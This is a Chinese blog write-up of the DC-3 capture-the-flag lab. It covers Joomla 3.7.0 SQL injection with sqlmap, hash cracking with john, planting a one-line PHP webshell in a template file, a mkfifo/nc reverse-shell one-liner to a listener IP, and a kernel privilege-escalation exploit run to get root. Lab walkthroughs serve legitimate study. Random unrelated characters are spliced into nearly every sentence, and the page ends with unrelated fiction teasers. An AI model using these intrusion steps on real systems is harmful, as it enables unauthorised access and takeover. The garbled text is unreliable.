DC - 3

flag

nmap開路漾岳,拿到靶機(jī)的IP如下:

image.png

再進(jìn)行端口掃描腋寨,結(jié)果如下:

image.png

可以看到有80端口,打開瀏覽器訪問80端口痹换。根據(jù)網(wǎng)站內(nèi)容說只有一個(gè)flag征字,要拿root才行。第一反應(yīng)就是webshell然后提權(quán)娇豫。通過指紋識(shí)別可以知道CMS是joomla(其實(shí)有經(jīng)驗(yàn)的話看網(wǎng)站標(biāo)題上面的圖標(biāo)就知道是joolma)匙姜,而kali自帶一個(gè)叫joomlascan,命令:joomscan --url 鏈接冯痢,掃描可知版本為3.7.0氮昧,登錄后臺(tái)為url/administrator。用msf搜索可利用漏洞浦楣。searchsploit joomla 3.7.0

image.png

看第一個(gè)袖肥,是注入漏洞。

image.png

接下來就是查看42033.txt這個(gè)文件振劳,需要找到其完整路徑椎组,命令:searchsploit -p php/webapps/42033.txt(-p表示顯示完整路徑)

image.png

可以看到其完整路徑,然后就可以查看它历恐,至于查看方法隨你寸癌。

image.png

它告訴了我們注入點(diǎn)以及注入方法,sqlmap的使用就不多說了弱贼,注意的是最后字段的時(shí)候不要用--batch蒸苇,每一步都選y就行了,如下是數(shù)據(jù)庫數(shù)據(jù)吮旅。我們需要拿到的是username和password數(shù)據(jù)溪烤。

image.png
image.png

結(jié)果是加密的,這里引入一個(gè)叫john的工具庇勃,它是一個(gè)解密工具檬嘀,kali自帶,直接拿來用就行了责嚷。在用之前先將密文存儲(chǔ)到一個(gè)txt文件中去鸳兽,然后john 文件.txt,然后john --show 文件.txt查看結(jié)果再层。

image.png

密碼為snoopy(史努比)贸铜,就可以拿它登錄后臺(tái)了。到這一步要最做的就是隨便點(diǎn)點(diǎn)聂受,看看有沒有上傳漏洞點(diǎn)蒿秦,經(jīng)過一番折騰,找到了一個(gè)可寫入后門的點(diǎn)蛋济,就在路徑localhost/templates/beez3/html下棍鳖。把modules.php內(nèi)容改為一句話木馬碗旅,然后用蟻劍連接(也可以新建一個(gè)文件)。

image.png

然后在虛擬終端里查詢系統(tǒng)信息祟辟,uname -a,cat /etc/issue

image.png

是Ubuntu 16.04旧困,再搜索對(duì)應(yīng)的漏洞如下醇份,為什么使用這個(gè)呢吼具,其實(shí)是一個(gè)個(gè)試出來的,最后發(fā)現(xiàn)這個(gè)可以用拗盒。怖竭。。

image.png

然后搞一個(gè)反彈shell先陡蝇。

  1. kali終端輸入
image.png

nc -nvlp

  1. 蟻劍虛擬終端輸入

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.16.137 4444 >/tmp/f

注意上面的ip是你kali的ip,因?yàn)樯厦嫖冶O(jiān)聽的是4444端口毅整,所以要輸入4444端口,之后kali端成功獲取反彈shell悼嫉。然后再回到漏洞版本那里,查看對(duì)應(yīng)文檔蹋凝,里面寫的有使用方法总棵。

image.png

然后把壓縮包下載下來用蟻劍上傳。在靶機(jī)里解壓情龄,之后進(jìn)入到解壓目錄捍壤,再用命令tar -xvf 目標(biāo).tar對(duì)exploit.tar進(jìn)行解壓鞍爱。進(jìn)入新生成的目錄ebpf_mapfd_doubleput_exploit,依次執(zhí)行

./compile.sh
./doubleput

成功提權(quán)盗扇,回到root文件夾沉填。發(fā)現(xiàn)有flag,直接查看

image.png
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末斑鼻,一起剝皮案震驚了整個(gè)濱河市猎荠,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌法牲,老刑警劉巖史汗,帶你破解...
    沈念sama閱讀 219,039評(píng)論 6 508
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件拒垃,死亡現(xiàn)場(chǎng)離奇詭異,居然都是意外死亡悼瓮,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,426評(píng)論 3 395
  • 文/潘曉璐 我一進(jìn)店門埋市,熙熙樓的掌柜王于貴愁眉苦臉地迎上來命贴,“玉大人,你說我怎么就攤上這事污茵≡嵯睿” “怎么了?”我有些...
    開封第一講書人閱讀 165,417評(píng)論 0 356
  • 文/不壞的土叔 我叫張陵襟士,是天一觀的道長(zhǎng)。 經(jīng)常有香客問我陋桂,道長(zhǎng),這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,868評(píng)論 1 295
  • 正文 為了忘掉前任,我火速辦了婚禮搜变,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘努潘。我一直安慰自己,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,892評(píng)論 6 392
  • 文/花漫 我一把揭開白布岛请。 她就那樣靜靜地躺著警绩,像睡著了一般。 火紅的嫁衣襯著肌膚如雪肩祥。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,692評(píng)論 1 305
  • 那天岸霹,我揣著相機(jī)與錄音将饺,去河邊找鬼。 笑死予弧,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的皇筛。 我是一名探鬼主播坠七,決...
    沈念sama閱讀 40,416評(píng)論 3 419
  • 文/蒼蘭香墨 我猛地睜開眼旗笔,長(zhǎng)吁一口氣:“原來是場(chǎng)噩夢(mèng)啊……” “哼拄踪!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起撮弧,我...
    開封第一講書人閱讀 39,326評(píng)論 0 276
  • 序言:老撾萬榮一對(duì)情侶失蹤姚糊,失蹤者是張志新(化名)和其女友劉穎,沒想到半個(gè)月后贸辈,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,782評(píng)論 1 316
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡擎淤,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,957評(píng)論 3 337
  • 正文 我和宋清朗相戀三年嘴拢,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了寂纪。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 40,102評(píng)論 1 350
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡抢腐,死狀恐怖襟交,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情捣域,我是刑警寧澤,帶...
    沈念sama閱讀 35,790評(píng)論 5 346
  • 正文 年R本政府宣布迹鹅,位于F島的核電站贞言,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜弟蚀,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,442評(píng)論 3 331
  • 文/蒙蒙 一义钉、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧捶闸,春花似錦、人聲如沸贪绘。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,996評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至边酒,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間墩朦,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 33,113評(píng)論 1 272
  • 我被黑心中介騙來泰國(guó)打工牛哺, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留劳吠,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 48,332評(píng)論 3 373
  • 正文 我出身青樓淳附,卻偏偏與公主長(zhǎng)得像蠢古,于是被迫代替她去往敵國(guó)和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子草讶,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,044評(píng)論 2 355

推薦閱讀更多精彩內(nèi)容

  • 信息收集 arp-scan探測(cè)位置,nmap去進(jìn)行一個(gè)初步的掃描脊框。發(fā)現(xiàn)他運(yùn)行在ubuntu上,只開放80端口沉御,但是...
    BurnyMcDull閱讀 747評(píng)論 0 0
  • 實(shí)驗(yàn)環(huán)境 攻擊機(jī)kali: ip 172.25.0.69 DC3靶機(jī): MAC地址 00:0c:29:e5:84:...
    xioooZorro閱讀 463評(píng)論 0 0
  • 標(biāo)簽:本地文件包含(LFI)昭灵、FUZZ吠裆、PHP偽協(xié)議烂完、nginx日志文件寫一句話、反彈shell抠蚣、screen提權(quán)...
    z1掛東南閱讀 1,396評(píng)論 0 1
  • 轉(zhuǎn)自:http://www.freebuf.com/sectool/105524.html 本文為作者總結(jié)自己在滲...
    許安念安閱讀 5,462評(píng)論 0 10
  • 前言 提權(quán)何須收集各種EXP嘶窄,一個(gè)MSF就夠了,本文為大家?guī)鞰SF綜合提權(quán)的一些姿勢(shì)柄冲。 文章內(nèi)容: 學(xué)習(xí)`Met...
    欽玄閱讀 9,093評(píng)論 1 9